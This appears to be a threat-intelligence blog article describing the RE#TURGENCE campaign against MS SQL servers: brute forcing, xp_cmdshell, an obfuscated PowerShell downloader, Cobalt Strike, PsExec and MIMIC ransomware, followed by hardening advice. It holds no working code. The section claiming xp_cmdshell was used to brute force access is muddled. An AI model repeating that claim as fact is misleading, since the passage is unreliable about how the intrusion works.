In recent times, a highly concerning threat campaign known as RE#TURGENCE has emerged, specifically targeting vulnerable MS SQL servers. This article sheds light on the tactics employed by Turkish threat actors with financial motivations, the targeted regions, and the end goals of the campaign. Furthermore, we delve into the methods utilized by these attackers, their exploitation of system vulnerabilities, and the potential ramifications for organizations. Finally, we provide vital recommendations to safeguard critical servers from compromising attacks in scenarios similar to RE#TURGENCE.
Target and Motivations
The primary perpetrators of the RE#TURGENCE campaign have been identified as Turkish threat actors, driven by financial incentives. Their focus is centered on the United States, the European Union, and Latin American nations. Their choice of targets within these regions indicates a calculated approach to maximize potential profits by exploiting the economic importance and prevalence of MS SQL servers.
Tactics and End Goals
As the analyzed threat campaign progresses, it becomes apparent that the attackers have two primary objectives in mind. The first involves capitalizing on the compromised hosts by selling “access” to other threat actors or cybercriminal groups. This allows them to obtain immediate financial gains. The second objective entails the ultimate goal of delivering ransomware payloads onto the vulnerable servers, which could lead to severe consequences for the impacted organizations.
Brute Forcing and Execution
To gain unauthorized access to victim servers, the threat actors employed the xp_cmdshell procedure. By utilizing this method, the attackers aimed to brute force their way into the target systems and gain privileged access. This technique highlights the importance of robust password policies and the implementation of comprehensive security measures to protect against brute force attacks.
Command Execution
Once successful access was gained using the xp_cmdshell procedure, the attackers proceeded to execute commands on the compromised server from the sqlservr.exe process. This allowed them to establish a foothold within the targeted system, enabling further exploitation and lateral movement across the network.
Obfuscated PowerShell Script
The attackers employed a semi-obfuscated PowerShell script as a means to download and execute the next phase of their attack. The script’s deliberate obfuscation makes it challenging for security measures to detect and mitigate the threat effectively. Analyzing the script’s code reveals deliberate attempts to mislead and evade detection, emphasizing the attackers’ sophisticated tactics.
Interactive Code Execution
To facilitate their operations, the attackers opted to utilize Cobalt Strike as the primary point of code execution. Cobalt Strike is a powerful and versatile tool that allows attackers to operate stealthily, evade detection, and maintain persistence within the compromised systems. The choice of Cobalt Strike indicates a more interactive strategy, enabling the threat actors to adapt their approach in real-time and maximize their chances of successful exploitation.
Lateral Movement with PsExec
To achieve lateral movement across the network and gain control of additional systems, the attackers employed PsExec. PsExec, a legitimate system administration tool, enables the execution of programs on remote Windows hosts. The exploitation of PsExec highlights the importance of strong network segmentation and access control mechanisms that limit the use of such tools to authorized personnel only.
Historic Context of MIMIC Ransomware
In January 2023, the insidious MIMIC ransomware first emerged as a significant threat in the cybersecurity landscape. It swiftly gained traction among cyber criminals due to its ability to remove all binaries utilized in the encryption process, making it challenging for security professionals and victims to recover their data. The RE#TURGENCE campaign’s utilization of MIMIC emphasizes the evolving nature of ransomware attacks and the need for robust mitigation strategies.
Security Recommendation
In light of the resurgence campaign and its potential consequences, it is imperative for organizations to implement preventive measures. A core recommendation is to avoid leaving critical servers exposed to the internet. Implementing secure access controls, regularly patching vulnerabilities, employing network segregation, and practicing robust password policies are essential steps to prevent unauthorized access and mitigate the risk of similar attacks.
The ongoing threat campaign, RE#TURGENCE, poses a severe risk to organizations utilizing vulnerable MS SQL servers. Turkish threat actors, driven by financial motivations, are employing sophisticated tactics, including brute forcing, obfuscated scripts, interactive code execution, and the utilization of legitimate tools. By following the outlined security recommendations, organizations can fortify their defenses, protect critical assets, and mitigate the potential fallout from such attacks. It is imperative to stay vigilant, apply security best practices, and prioritize proactive defense strategies to safeguard against evolving threat campaigns like RE#TURGENCE.